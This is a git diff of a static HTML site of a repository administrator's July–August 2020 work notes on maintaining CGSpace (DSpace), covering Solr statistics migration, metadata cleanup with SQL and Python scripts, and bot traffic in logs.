com.atmire.dspace.cua.dao.impl.CUAStorageReportDAOImpl$CUAEPersonStorageReportDAOImpl#0,com.atmire.dspace.cua.dao.impl.CUAStorageReportDAOImpl$CUAEPersonStorageReportDAOImpl#1
     
    • I had told Atmire about this several weeks ago… but I reminded them again in the ticket
        @@ -308,23 +308,23 @@ Typhoeus
    -
    $ curl -g -s 'http://localhost:8081/solr/statistics-2019/select?q=*:*&fq=time:%5B2019-01-01T00%3A00%3A00Z%20TO%202019-06-30T23%3A59%3A59Z%5D&rows=0&wt=json&indent=true'
    +
    $ curl -g -s 'http://localhost:8081/solr/statistics-2019/select?q=*:*&fq=time:%5B2019-01-01T00%3A00%3A00Z%20TO%202019-06-30T23%3A59%3A59Z%5D&rows=0&wt=json&indent=true'
     {
    -  "responseHeader":{
    -    "status":0,
    -    "QTime":0,
    -    "params":{
    -      "q":"*:*",
    -      "indent":"true",
    -      "fq":"time:[2019-01-01T00:00:00Z TO 2019-06-30T23:59:59Z]",
    -      "rows":"0",
    -      "wt":"json"}},
    -  "response":{"numFound":7784285,"start":0,"docs":[]
    +  "responseHeader":{
    +    "status":0,
    +    "QTime":0,
    +    "params":{
    +      "q":"*:*",
    +      "indent":"true",
    +      "fq":"time:[2019-01-01T00:00:00Z TO 2019-06-30T23:59:59Z]",
    +      "rows":"0",
    +      "wt":"json"}},
    +  "response":{"numFound":7784285,"start":0,"docs":[]
       }}
     
    • But not in solr-import-export-json… hmmm… seems we need to URL encode only the date range itself, but not the brackets:
    -
    $ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a export -o /tmp/statistics-2019-1.json -f 'time:%5B2019-01-01T00%3A00%3A00Z%20TO%202019-06-30T23%3A59%3A59Z]' -k uid
    +
    $ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a export -o /tmp/statistics-2019-1.json -f 'time:%5B2019-01-01T00%3A00%3A00Z%20TO%202019-06-30T23%3A59%3A59Z]' -k uid
     $ zstd /tmp/statistics-2019-1.json
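The two encodings discussed here can be reproduced with Python's `urllib.parse.quote`. This sketch only builds the filter strings and the helper names are hypothetical. The first form percent-encodes the brackets as well, as in the `curl` request. The second follows the description above and encodes only the date range.

```python
from urllib.parse import quote


def encode_full(start: str, end: str) -> str:
    """Percent-encode the whole range expression, brackets included."""
    return "time:" + quote(f"[{start} TO {end}]", safe="")


def encode_range_only(start: str, end: str) -> str:
    """Percent-encode only the date range and keep the brackets literal."""
    return "time:[" + quote(f"{start} TO {end}", safe="") + "]"


if __name__ == "__main__":
    start, end = "2019-01-01T00:00:00Z", "2019-06-30T23:59:59Z"
    print(encode_full(start, end))
    print(encode_range_only(start, end))
```

Passing `safe=""` makes `quote` encode the colons and spaces too, which matches the `%3A` and `%20` sequences in the commands above.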
     
    • Then import it on my local dev environment:
    • @@ -358,11 +358,11 @@ $ ./run.sh -s http://localhost:8080/solr/statistics -a import -o ~/Downloads/sta
    • I noticed that we have 20,000 distinct values for dc.subject, but there are at least 500 that are lower or mixed case that we should simply uppercase without further thought:
    -
    dspace=# UPDATE metadatavalue SET text_value=UPPER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ '[[:lower:]]';
    +
    dspace=# UPDATE metadatavalue SET text_value=UPPER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ '[[:lower:]]';
     
    • DSpace Test needs a different query because it is running DSpace 6 with UUIDs for everything:
    -
    dspace63=# UPDATE metadatavalue SET text_value=UPPER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=57 AND text_value ~ '[[:lower:]]';
    +
    dspace63=# UPDATE metadatavalue SET text_value=UPPER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=57 AND text_value ~ '[[:lower:]]';
     
    • Note the use of the POSIX character class :)
    • I suggest that we generate a list of the top 5,000 values that don’t match AGROVOC so that Sisay can correct them @@ -399,16 +399,16 @@ $ csvcut -c1 /tmp/2020-07-05-subjects-upper.csv | head -n 6500 > 2020-07-05-c
      • Peter asked me to send him a list of sponsors on CGSpace
      -
      dspace=# \COPY (SELECT DISTINCT text_value as "dc.description.sponsorship", count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=29 GROUP BY "dc.description.sponsorship" ORDER BY count DESC) TO /tmp/2020-07-07-sponsors.csv WITH CSV HEADER;
      +
      dspace=# \COPY (SELECT DISTINCT text_value as "dc.description.sponsorship", count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=29 GROUP BY "dc.description.sponsorship" ORDER BY count DESC) TO /tmp/2020-07-07-sponsors.csv WITH CSV HEADER;
       COPY 707
       
      • I ran it quickly through my csv-metadata-quality tool and found two issues that I will correct with fix-metadata-values.py on CGSpace immediately:
      $ cat 2020-07-07-fix-sponsors.csv
       dc.description.sponsorship,correct
      -"Ministe`re des Affaires Etrange`res et Européennes, France","Ministère des Affaires Étrangères et Européennes, France"
      -"Global Food Security Programme,  United Kingdom","Global Food Security Programme, United Kingdom"
      -$ ./fix-metadata-values.py -i 2020-07-07-fix-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t correct -m 29
      +"Ministe`re des Affaires Etrange`res et Européennes, France","Ministère des Affaires Étrangères et Européennes, France"
      +"Global Food Security Programme,  United Kingdom","Global Food Security Programme, United Kingdom"
      +$ ./fix-metadata-values.py -i 2020-07-07-fix-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t correct -m 29
       
      • Upload the Capacity Development July newsletter to CGSpace for Ben Hack because Abenet and Bizu usually do it, but they are currently offline due to the Internet being turned off in Ethiopia
          @@ -432,9 +432,9 @@ $ ./fix-metadata-values.py -i 2020-07-07-fix-sponsors.csv -db dspace -u dspace -
          • Generate a CSV of all the AGROVOC subjects that didn’t match from the top 6500 I exported earlier this week:
          -
          $ csvgrep -c 'number of matches' -r "^0$" 2020-07-05-cgspace-subjects.csv | csvcut -c 1 > 2020-07-05-cgspace-invalid-subjects.csv
          +
          $ csvgrep -c 'number of matches' -r "^0$" 2020-07-05-cgspace-subjects.csv | csvcut -c 1 > 2020-07-05-cgspace-invalid-subjects.csv
           
            -
          • Yesterday Gabriela from CIP emailed to say that she was removing the accents from her authors' names because of “funny character” issues with reports generated from CGSpace +
          • Yesterday Gabriela from CIP emailed to say that she was removing the accents from her authors’ names because of “funny character” issues with reports generated from CGSpace
            • I told her that it’s probably her Windows / Excel that is messing up the data, and she figured out how to open them correctly!
            • Now she says she doesn’t want to remove the accents after all and she sent me a new list of corrections
            • @@ -442,13 +442,13 @@ $ ./fix-metadata-values.py -i 2020-07-07-fix-sponsors.csv -db dspace -u dspace -
          -
          $ csvgrep -c 2 -r "^.+$" ~/Downloads/cip-authors-GH-20200706.csv | csvgrep -c 1 -r "^.*[À-ú].*$" | csvgrep -c 2 -r "^.*[À-ú].*$" -i | csvcut -c 1,2
          +
          $ csvgrep -c 2 -r "^.+$" ~/Downloads/cip-authors-GH-20200706.csv | csvgrep -c 1 -r "^.*[À-ú].*$" | csvgrep -c 2 -r "^.*[À-ú].*$" -i | csvcut -c 1,2
           dc.contributor.author,correction
          -"López, G.","Lopez, G."
          -"Gómez, R.","Gomez, R."
          -"García, M.","Garcia, M."
          -"Mejía, A.","Mejia, A."
          -"Quiróz, Roberto A.","Quiroz, R."
          +"López, G.","Lopez, G."
          +"Gómez, R.","Gomez, R."
          +"García, M.","Garcia, M."
          +"Mejía, A.","Mejia, A."
          +"Quiróz, Roberto A.","Quiroz, R."
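The same kind of check can be sketched in Python for anyone without csvkit. This is an illustrative approach, not what was run here: it flags corrections that differ from the original only by dropped accents, which is stricter than the csvgrep character-range filter above (the "Quiróz, Roberto A." row also shortens the name, so it is not flagged). The helper names are hypothetical:

```python
import unicodedata


def strip_accents(text):
    """Remove combining marks after canonical decomposition (NFD)."""
    decomposed = unicodedata.normalize("NFD", text)
    return "".join(ch for ch in decomposed if not unicodedata.combining(ch))


def only_removes_accents(original, correction):
    """True when the correction is just the original minus its accents."""
    return original != correction and strip_accents(original) == correction


rows = [
    ("López, G.", "Lopez, G."),
    ("Quiróz, Roberto A.", "Quiroz, R."),
]
for original, correction in rows:
    print(original, "->", correction, only_removes_accents(original, correction))
```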
           
          • csvgrep from the csvkit suite is so cool:

            @@ -475,7 +475,7 @@ dc.contributor.author,correction
        -
        dspace=# \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-07-08-affiliations.csv WITH CSV HEADER;
        +
        dspace=# \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-07-08-affiliations.csv WITH CSV HEADER;
         
        • Then I stripped the CSV header and quotes to make it a plain text file and ran ror-lookup.py:
        @@ -510,12 +510,12 @@ $ csvgrep -c matched -m false 2020-07-08-affiliations-ror.csv | wc -l
      • So now our matching improves to 1515 out of 5866 (25.8%)
      • Gabriela from CIP said that I should run the author corrections minus those that remove accent characters so I will run it on CGSpace:
      -
      $ ./fix-metadata-values.py -i /tmp/2020-07-09-fix-90-cip-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correction -m 3
      +
      $ ./fix-metadata-values.py -i /tmp/2020-07-09-fix-90-cip-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correction -m 3
       
      • Apply 110 fixes and 90 deletions to sponsorships that Peter sent me a few days ago:
      -
      $ ./fix-metadata-values.py -i /tmp/2020-07-07-fix-110-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t 'correct/action' -m 29
      -$ ./delete-metadata-values.py -i /tmp/2020-07-07-delete-90-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29
      +
      $ ./fix-metadata-values.py -i /tmp/2020-07-07-fix-110-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t 'correct/action' -m 29
      +$ ./delete-metadata-values.py -i /tmp/2020-07-07-delete-90-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29
       
      • Start a full Discovery re-index on CGSpace:
      @@ -552,7 +552,7 @@ $ csvgrep -c matched -m true 2020-07-09-cgspace-sponsors-crossref.csv | wc -l
    -
    # grep 199.47.87 dspace.log.2020-07-12 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
    +
    # grep 199.47.87 dspace.log.2020-07-12 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
     2815
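For reference, the grep, sort, uniq, wc pipeline above amounts to collecting distinct session IDs into a set. A rough Python equivalent, assuming log lines that contain a `session_id=` token; the sample lines are made up and much shorter than real DSpace log entries, and the IP match is a literal substring rather than a regex:

```python
import re

SESSION_RE = re.compile(r"session_id=([A-Z0-9]{32})")


def count_unique_sessions(lines, ip_prefix):
    """Count distinct session IDs on log lines containing ip_prefix."""
    sessions = set()
    for line in lines:
        if ip_prefix not in line:
            continue
        sessions.update(SESSION_RE.findall(line))
    return len(sessions)


# Made-up log lines; only the session_id=... token mirrors the grep pattern.
sample = [
    "INFO session_id=" + "A" * 32 + ":ip_addr=199.47.87.1",
    "INFO session_id=" + "A" * 32 + ":ip_addr=199.47.87.1",
    "INFO session_id=" + "B" * 32 + ":ip_addr=199.47.87.2",
    "INFO session_id=" + "C" * 32 + ":ip_addr=10.0.0.1",
]
print(count_unique_sessions(sample, "199.47.87"))
```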
     
    • So I need to add this alternative user-agent to the Tomcat Crawler Session Manager valve to force it to re-use a common bot session
    • @@ -567,7 +567,7 @@ $ csvgrep -c matched -m true 2020-07-09-cgspace-sponsors-crossref.csv | wc -l
    • Generate a list of sponsors to update our controlled vocabulary:
    -
    dspace=# \COPY (SELECT DISTINCT text_value as "dc.description.sponsorship", count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=29 GROUP BY "dc.description.sponsorship" ORDER BY count DESC LIMIT 125) TO /tmp/2020-07-12-sponsors.csv;
    +
    dspace=# \COPY (SELECT DISTINCT text_value as "dc.description.sponsorship", count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=29 GROUP BY "dc.description.sponsorship" ORDER BY count DESC LIMIT 125) TO /tmp/2020-07-12-sponsors.csv;
     COPY 125
     dspace=# \q
     $ csvcut -c 1 --tabs /tmp/2020-07-12-sponsors.csv > dspace/config/controlled-vocabularies/dc-description-sponsorship.xml
    @@ -590,12 +590,12 @@ $ tidy -xml -utf8 -m -iq -w 0 dspace/config/controlled-vocabularies/dc-descripti
     
    • I ran the dspace cleanup -v process on CGSpace and got an error:
    -
    Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    -  Detail: Key (bitstream_id)=(189618) is still referenced from table "bundle".
    +
    Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    +  Detail: Key (bitstream_id)=(189618) is still referenced from table "bundle".
     
    • The solution is, as always:
    -
    $ psql -d dspace -U dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (189618, 188837);'
    +
    $ psql -d dspace -U dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (189618, 188837);'
     UPDATE 1
     
    • Udana from WLE asked me about some items that didn’t show Altmetric donuts @@ -625,13 +625,13 @@ COPY 194 $ csvgrep -c matched -m false /tmp/2020-07-15-countries-resolved.csv country,match type,matched CAPE VERDE,,false -"KOREA, REPUBLIC",,false +"KOREA, REPUBLIC",,false PALESTINE,,false -"CONGO, DR",,false -COTE D'IVOIRE,,false +"CONGO, DR",,false +COTE D'IVOIRE,,false RUSSIA,,false SYRIA,,false -"KOREA, DPR",,false +"KOREA, DPR",,false SWAZILAND,,false MICRONESIA,,false TIBET,,false @@ -642,16 +642,16 @@ IRAN,,false
    • Check the database for DOIs that are not in the preferred “https://doi.org/” format:
    -
    dspace=# \COPY (SELECT text_value as "cg.identifier.doi" FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=220 AND text_value NOT LIKE 'https://doi.org/%') TO /tmp/2020-07-15-doi.csv WITH CSV HEADER;
    +
    dspace=# \COPY (SELECT text_value as "cg.identifier.doi" FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=220 AND text_value NOT LIKE 'https://doi.org/%') TO /tmp/2020-07-15-doi.csv WITH CSV HEADER;
     COPY 186
     
    • Then I imported them into OpenRefine and replaced them in a new “correct” column using this GREL transform:
    -
    value.replace("dx.doi.org", "doi.org").replace("http://", "https://").replace("https://dx,doi,org", "https://doi.org").replace("https://doi.dx.org", "https://doi.org").replace("https://dx.doi:", "https://doi.org").replace("DOI: ", "https://doi.org/").replace("doi: ", "https://doi.org/").replace("http:/​/​dx.​doi.​org", "https://doi.org").replace("https://dx. doi.org. ", "https://doi.org").replace("https://dx.doi", "https://doi.org").replace("https://dx.doi:", "https://doi.org/").replace("hdl.handle.net", "doi.org")
    +
    value.replace("dx.doi.org", "doi.org").replace("http://", "https://").replace("https://dx,doi,org", "https://doi.org").replace("https://doi.dx.org", "https://doi.org").replace("https://dx.doi:", "https://doi.org").replace("DOI: ", "https://doi.org/").replace("doi: ", "https://doi.org/").replace("http:/​/​dx.​doi.​org", "https://doi.org").replace("https://dx. doi.org. ", "https://doi.org").replace("https://dx.doi", "https://doi.org").replace("https://dx.doi:", "https://doi.org/").replace("hdl.handle.net", "doi.org")
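A chain of literal replacements like this is order-sensitive, so a regex-based version may be easier to reason about. The following Python sketch is only an assumption about how one could do it outside OpenRefine: it covers the clean cases (a `doi:` label, `http://`, `dx.doi.org`) and deliberately leaves typo variants and `hdl.handle.net` values untouched for manual review. The function name and the `10.1000/xyz` DOI are placeholders:

```python
import re


def normalize_doi(value):
    """Rewrite common DOI spellings to the https://doi.org/ form."""
    doi = value.strip()
    # Drop a leading "doi:" or "DOI:" label.
    doi = re.sub(r"^doi:\s*", "", doi, flags=re.IGNORECASE)
    # Drop an http(s) scheme with a doi.org or dx.doi.org host.
    doi = re.sub(r"^https?://(dx\.)?doi\.org/", "", doi, flags=re.IGNORECASE)
    if not doi.startswith("10."):
        # Not recognisable as a bare DOI; leave it for manual review.
        return value
    return "https://doi.org/" + doi


for raw in ["http://dx.doi.org/10.1000/xyz", "DOI: 10.1000/xyz"]:
    print(raw, "->", normalize_doi(raw))
```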
     
    • Then I fixed the DOIs on CGSpace:
    -
    $ ./fix-metadata-values.py -i /tmp/2020-07-15-fix-164-DOIs.csv -db dspace -u dspace -p 'fuuu' -f cg.identifier.doi -t 'correct' -m 220
    +
    $ ./fix-metadata-values.py -i /tmp/2020-07-15-fix-164-DOIs.csv -db dspace -u dspace -p 'fuuu' -f cg.identifier.doi -t 'correct' -m 220
     
    • I filed an issue on Debian’s iso-codes project to ask why “Swaziland” does not appear in the ISO 3166-3 list of historical country names despite it being changed to “Eswatini” in 2018.
    • Atmire responded about the Solr issue @@ -666,7 +666,7 @@ COPY 186
      • Looking at the nginx logs on CGSpace (linode18) last night I see that the Macaroni Bros have started using a unique identifier for at least one of their harvesters:
      -
      217.64.192.138 - - [20/Jul/2020:01:01:39 +0200] "GET /rest/rest/bitstreams/114779/retrieve HTTP/1.0" 302 138 "-" "ILRI Livestock Website Publications importer BOT"
      +
      217.64.192.138 - - [20/Jul/2020:01:01:39 +0200] "GET /rest/rest/bitstreams/114779/retrieve HTTP/1.0" 302 138 "-" "ILRI Livestock Website Publications importer BOT"
       
      • I still see 12,000 records in Solr from this user agent, though.
          @@ -683,7 +683,7 @@ COPY 186
        • I re-ran the check-spider-hits.sh script with the new lists and purged about 14,000 more stats hits for each of several years (2020, 2019, 2018, 2017, 2016), around 70,000 in total
        • I looked at the CLARISA institutions list again, since I hadn’t looked at it in over six months:
        -
        $ cat ~/Downloads/response_1595270924560.json | jq '.[] | {name: .name}' | grep name | awk -F: '{print $2}' | sed -e 's/"//g' -e 's/^ //' -e '1iname' | csvcut -l | sed '1s/line_number/id/' > /tmp/clarisa-institutions.csv
        +
        $ cat ~/Downloads/response_1595270924560.json | jq '.[] | {name: .name}' | grep name | awk -F: '{print $2}' | sed -e 's/"//g' -e 's/^ //' -e '1iname' | csvcut -l | sed '1s/line_number/id/' > /tmp/clarisa-institutions.csv
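The jq, awk and sed pipeline above is fragile if a name contains a colon or a quote. As a hedged alternative, here is a small Python sketch that does the same JSON to CSV conversion with proper quoting; it assumes the response is a JSON array of objects with a `name` key, and the sample payload is invented:

```python
import csv
import io
import json


def institutions_to_csv(raw_json):
    """Turn a JSON array of objects with a "name" key into id,name CSV text."""
    institutions = json.loads(raw_json)
    buffer = io.StringIO()
    writer = csv.writer(buffer, lineterminator="\n")
    writer.writerow(["id", "name"])
    for line_number, institution in enumerate(institutions, start=1):
        writer.writerow([line_number, institution["name"]])
    return buffer.getvalue()


# Hypothetical payload; the shape of the real response is an assumption.
sample = '[{"name": "Example University"}, {"name": "Institute, Example"}]'
print(institutions_to_csv(sample), end="")
```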
         
        • The API still needs a key unless you query from the Swagger web interface
            @@ -732,7 +732,7 @@ Removing unnecessary Unicode (U+200B): Agencia de Servicios a la Comercializaci
          • I started processing the 2019 stats in a batch of 1 million on DSpace Test:
          -
          $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
          +
          $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
           $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics-2019
           ...
                   *** Statistics Records with Legacy Id ***
          @@ -749,7 +749,7 @@ $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics-2019
           
          • The statistics-2019 finished processing after about 9 hours so I started the 2018 ones:
          -
          $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
          +
          $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
           $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics-2018
                   *** Statistics Records with Legacy Id ***
           
          @@ -793,12 +793,12 @@ $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics-2018
           
      -
      Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
      -org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
      +
      Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
      +org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
       
      • There were four records so I deleted them:
      -
      $ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:10</query></delete>'
      +
      $ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:10</query></delete>'
       
      • Meeting with Moayad and Peter and Abenet to discuss the latest AReS changes
      @@ -932,7 +932,7 @@ mailto\:team@impactstory\.org
    • Export some of the CGSpace Solr stats minus the Atmire CUA schema additions for Salem to play with:
    -
    $ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics-2019 -a export -o /tmp/statistics-2019-1.json -f 'time:[2019-01-01T00\:00\:00Z TO 2019-06-30T23\:59\:59Z]' -k uid -S author_mtdt,author_mtdt_search,iso_mtdt_search,iso_mtdt,subject_mtdt,subject_mtdt_search,containerCollection,containerCommunity,containerItem,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,geoipcountrycode,ip_ngram,ip_search,isArchived,isInternal,isWithdrawn,containerBitstream,file_id,referrer_ngram,referrer_search,userAgent_ngram,userAgent_search,version_id,complete_query,complete_query_search,filterquery,ngram_query_search,ngram_simplequery_search,simple_query,simple_query_search,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,actingGroupId,actorMemberGroupId,bitstreamCount,solr_update_time_stamp,bitstreamId
    +
    $ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics-2019 -a export -o /tmp/statistics-2019-1.json -f 'time:[2019-01-01T00\:00\:00Z TO 2019-06-30T23\:59\:59Z]' -k uid -S author_mtdt,author_mtdt_search,iso_mtdt_search,iso_mtdt,subject_mtdt,subject_mtdt_search,containerCollection,containerCommunity,containerItem,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,geoipcountrycode,ip_ngram,ip_search,isArchived,isInternal,isWithdrawn,containerBitstream,file_id,referrer_ngram,referrer_search,userAgent_ngram,userAgent_search,version_id,complete_query,complete_query_search,filterquery,ngram_query_search,ngram_simplequery_search,simple_query,simple_query_search,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,actingGroupId,actorMemberGroupId,bitstreamCount,solr_update_time_stamp,bitstreamId
     
    • Run system updates on DSpace Test (linode26) and reboot it

      @@ -1040,7 +1040,7 @@ mailto\:team@impactstory\.org
    • This one failed after a few hours:
    -
    Record uid: c4b5974a-025d-4adc-b6c3-c8846048b62b couldn't be processed
    +
    Record uid: c4b5974a-025d-4adc-b6c3-c8846048b62b couldn't be processed
     com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: c4b5974a-025d-4adc-b6c3-c8846048b62b, an error occured in the com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor
             at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(SourceFile:304)
             at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(SourceFile:176)
    @@ -1063,7 +1063,7 @@ If run the update again with the resume option (-r) they will be reattempted
     
  • I started the same script for the statistics-2019 core (12 million records…)
  • Update an ILRI author’s name on CGSpace:
  • -
    $ ./fix-metadata-values.py -i /tmp/2020-07-27-fix-ILRI-author.csv -db dspace -u cgspace -p 'fuuu' -f dc.contributor.author -t 'correct' -m 3
    +
    $ ./fix-metadata-values.py -i /tmp/2020-07-27-fix-ILRI-author.csv -db dspace -u cgspace -p 'fuuu' -f dc.contributor.author -t 'correct' -m 3
     Fixed 13 occurences of: Muloi, D.
     Fixed 4 occurences of: Muloi, D.M.
     

    2020-07-28

    @@ -1112,11 +1112,11 @@ Fixed 4 occurences of: Muloi, D.M.
    # grep -c numeric /usr/share/iso-codes/json/iso_3166-1.json
     249
    -# grep -c -E '"name":' /usr/share/iso-codes/json/iso_3166-1.json
    +# grep -c -E '"name":' /usr/share/iso-codes/json/iso_3166-1.json
     249
    -# grep -c -E '"official_name":' /usr/share/iso-codes/json/iso_3166-1.json
    +# grep -c -E '"official_name":' /usr/share/iso-codes/json/iso_3166-1.json
     173
    -# grep -c -E '"common_name":' /usr/share/iso-codes/json/iso_3166-1.json
    +# grep -c -E '"common_name":' /usr/share/iso-codes/json/iso_3166-1.json
     6
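Counting with grep works because each key sits on its own line in the file. A structure-aware count could look like the Python sketch below. It assumes the file is a JSON object with a top-level `3166-1` list of entries, and it runs against a hand-written two-entry sample rather than the real file:

```python
import json
from collections import Counter


def count_keys(iso_json):
    """Count how many entries in the "3166-1" list carry each key."""
    counts = Counter()
    for entry in json.loads(iso_json)["3166-1"]:
        counts.update(entry.keys())
    return counts


# Abbreviated, hand-written sample in the assumed layout of iso_3166-1.json.
sample = json.dumps({
    "3166-1": [
        {"alpha_2": "AW", "name": "Aruba", "numeric": "533"},
        {
            "alpha_2": "BO",
            "name": "Bolivia, Plurinational State of",
            "official_name": "Plurinational State of Bolivia",
            "common_name": "Bolivia",
            "numeric": "068",
        },
    ]
})
counts = count_keys(sample)
print(counts["name"], counts["official_name"], counts["common_name"])
```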
     
    • Wow, the CC-BY-NC-ND-3.0-IGO license that I had requested in 2019-02 was finally merged into SPDX…
    • diff --git a/docs/2020-08/index.html b/docs/2020-08/index.html index 0add6193d..fa562c5d7 100644 --- a/docs/2020-08/index.html +++ b/docs/2020-08/index.html @@ -36,7 +36,7 @@ It is class based so I can easily add support for other vocabularies, and the te "/> - + @@ -150,8 +150,8 @@ It is class based so I can easily add support for other vocabularies, and the te
    • I purged all unmigrated stats in a few cores and then restarted processing:
    -
    $ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:/.*unmigrated.*/</query></delete>'
    -$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
    +
    $ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:/.*unmigrated.*/</query></delete>'
    +$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
     $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics
     
    • Andrea from Macaroni Bros emailed me a few days ago to say he’s having issues with the CGSpace REST API @@ -192,16 +192,16 @@ $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisti
    -
    $ http 'http://localhost:8080/rest/collections/1445' | json_pp | grep numberItems
    -   "numberItems" : 63,
    -$ http 'http://localhost:8080/rest/collections/1445/items' | jq '. | length'
    +
    $ http 'http://localhost:8080/rest/collections/1445' | json_pp | grep numberItems
    +   "numberItems" : 63,
    +$ http 'http://localhost:8080/rest/collections/1445/items' | jq '. | length'
     61
     
    • Also on DSpace Test (which is running DSpace 6!), though the issue is slightly different there:
    -
    $ http 'https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-497a18e3b708' | json_pp | grep numberItems
    -   "numberItems" : 61,
    -$ http 'https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-497a18e3b708/items' | jq '. | length'
    +
    $ http 'https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-497a18e3b708' | json_pp | grep numberItems
    +   "numberItems" : 61,
    +$ http 'https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-497a18e3b708/items' | jq '. | length'
     59
     
    • Ah! I exported that collection’s metadata and checked it in OpenRefine, where I noticed that two items are mapped twice @@ -210,7 +210,7 @@ $ http 'https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-49
    -
    dspace=# SELECT * FROM collection2item WHERE item_id = '107687';
    +
    dspace=# SELECT * FROM collection2item WHERE item_id = '107687';
        id   | collection_id | item_id
     --------+---------------+---------
      133698 |           966 |  107687
    @@ -220,8 +220,8 @@ $ http 'https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-49
     
    • So for each id you can delete one duplicate mapping:
    -
    dspace=# DELETE FROM collection2item WHERE id='134686';
    -dspace=# DELETE FROM collection2item WHERE id='128819';
    +
    dspace=# DELETE FROM collection2item WHERE id='134686';
    +dspace=# DELETE FROM collection2item WHERE id='128819';
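Finding such duplicate mappings for a whole table can be sketched in Python as below. This is an illustration only: the rows are hypothetical tuples shaped like `(id, collection_id, item_id)`, and keeping the lowest `id` of each pair is an arbitrary choice, not necessarily which row was deleted above:

```python
from collections import defaultdict


def duplicate_mapping_ids(rows):
    """Return row ids that repeat an earlier (collection_id, item_id) pair."""
    seen = defaultdict(list)
    for row_id, collection_id, item_id in sorted(rows):
        seen[(collection_id, item_id)].append(row_id)
    # Keep the lowest id of each pair, report the rest as redundant.
    return [row_id for ids in seen.values() for row_id in ids[1:]]


# Hypothetical rows shaped like (id, collection_id, item_id).
rows = [(1, 966, 107687), (2, 1445, 107687), (3, 1445, 107687)]
print(duplicate_mapping_ids(rows))
```

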